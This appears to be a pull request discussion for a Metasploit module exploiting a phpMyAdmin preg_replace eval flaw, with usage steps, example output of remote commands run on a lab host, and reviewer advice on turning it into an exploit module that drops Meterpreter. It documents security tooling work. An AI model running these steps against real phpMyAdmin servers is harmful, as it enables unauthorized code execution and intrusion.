Add 'phpMyAdmin Authenticated Remote Code Execution' aux module

[mcantoni]

phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a crafted string, as demonstrated by the table search-and-replace implementation.

Verification

List the steps needed to make sure this thing works

• Install phpMyAdmin (4.3.0 - https://www.phpmyadmin.net/files/4.3.0/)
• Start msfconsole
• use auxiliary/admin/http/phpmyadmin_null_termination_exec
• show options
• set rhost 1.2.3.4
• set password secret
• check
• exploit

Example Output

msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > run

[+] 192.168.253.129:80 - Output for "uname -a"
[+] 192.168.253.129:80 Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU\/Linux
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > set VERBOSE true
VERBOSE => true
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > set CMD "ls -la"
CMD => ls -la
msf5 auxiliary(admin/http/phpmyadmin_null_termination_exec) > run

[*] 192.168.253.129:80 - PHP version: PHP/5.3.10-1ubuntu3.26
[*] 192.168.253.129:80 - phpMyAdmin version: 4.3.0
[*] 192.168.253.129:80 - Grabbing CSRF token...
[*] 192.168.253.129:80 - Retrieved token
[*] 192.168.253.129:80 - Authenticating...
[*] 192.168.253.129:80 - Authentication successful
[*] 192.168.253.129:80 - Create random table 'idpX' into 'phpmyadmin' database...
[*] 192.168.253.129:80 - Random table created
[+] 192.168.253.129:80 - Output for "ls -la"
[+] 192.168.253.129:80 total 704
[+] 192.168.253.129:80 drwxr-xr-x  9 root root  4096 Apr  3 08:09 .
[+] 192.168.253.129:80 drwxr-xr-x  3 root root  4096 Dec 15 08:05 ..
[+] 192.168.253.129:80 -rw-r--r--  1 root root   102 Dec  5  2014 .coveralls.yml
[+] 192.168.253.129:80 -rw-r--r--  1 root root   582 Dec  5  2014 .scrutinizer.yml
[+] 192.168.253.129:80 -rw-r--r--  1 root root   731 Dec  5  2014 CONTRIBUTING.md
[+] 192.168.253.129:80 -rw-r--r--  1 root root 22283 Dec  5  2014 ChangeLog
...
...
[+] 192.168.253.129:80 -rw-r--r--  1 root root  5624 Dec  5  2014 user_password.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root   550 Dec  5  2014 version_check.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  8967 Dec  5  2014 view_create.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  3617 Dec  5  2014 view_operations.php
[+] 192.168.253.129:80 -rw-r--r--  1 root root  1129 Dec  5  2014 webapp.php
[*] 192.168.253.129:80 - Remove the random table 'idpX' from 'phpmyadmin' database
[*] Auxiliary module execution completed

[bcoles]

Is there a reason this was implemented as an auxiliary module rather than an exploit module? Typically remote code execution vulnerabilities can be turned into exploit modules.

In this instance, the vulnerability exists within a PHP eval call, making the vulnerability a perfect candidate for an ARCH_PHP exploit module.

Alternatively, if the PHP config or web server config are locked down, you could implement an ARCH_CMD module with system() - similar to what you're doing now. You could also take it a step further and implement a CmdStager to drop Meterpreter to disk and execute it.

[wvu]

Yes, this should be an exploit module. Also, I love that this is like a repeat of CVE-2013-3238. PMA ftw.

[wvu]

@mcantoni: Is that an R6 in your picture? :-)

[jrobles-r7]

Release Notes

This module exploits a vulnerability in a PHP's preg_replace() function that is used by phpMyAdmin's replace table feature. phpMyAdmin versions 4.6.x (prior to 4.6.3), 4.4.x versions (prior to 4.4.15.7), and 4.0.x versions (prior to 4.0.10.16) are affected.